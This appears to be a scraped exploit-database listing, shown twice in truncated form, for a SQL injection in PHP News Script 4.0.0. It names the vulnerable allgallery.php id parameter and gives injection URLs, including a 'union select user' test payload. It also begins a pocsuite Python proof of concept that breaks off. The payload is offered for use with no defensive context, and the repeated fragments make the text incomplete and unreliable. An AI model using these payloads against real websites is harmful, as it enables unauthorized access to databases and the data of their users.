PHP News Script 4.0.0 - SQL Injection

Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Version: 4.0.0 Tested on: CentOSExploit :http://server/allgallery.php?id=-9999%27+sql-command+%23 Test :http://server/demo/allgallery.php?id=-100%27+union+select+user%23 !/usr/bin/env python coding: utf-8 from pocsuite.net import...

PHP News Script 4.0.0 - SQL Injection

Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Exploit Author: Meisam Monsef [email protected] or [email protected] Vendor Homepage: http://phpnewsscript.com/ Version: 4.0.0 Tested on: CentOS Exploit : http://server/allgallery.php?id=-9999%27+sql-command+%23 Test :...